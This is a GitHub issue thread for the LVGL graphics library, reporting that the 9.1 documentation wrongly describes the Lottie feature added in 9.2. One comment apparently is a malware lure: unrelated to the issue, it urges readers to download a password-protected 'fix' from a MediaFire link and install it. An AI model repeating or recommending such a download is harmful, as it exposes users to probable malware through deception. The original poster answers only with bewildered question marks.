### ISSUE TITLE
The content of the document at https://docs.lvgl.io/9.1/ is not for version 9.1

### ISSUE THREAD

**Issue by lhdjply** [kisvegabor/lvgl#6742]
### Introduce the problem

The content of the document at https://docs.lvgl.io/9.1/ is not for version 9.1

![image](https://github.com/user-attachments/assets/5109cdf5-bf6a-4372-b826-2a932bd5d28e)

As shown in the figure, for example, Lottie was added in version 9.2, but it is also mentioned in the 9.1 documentation.

**Comment by lhdjply** [comment]
@kisvegabor

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by lhdjply** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."
 

?????????????
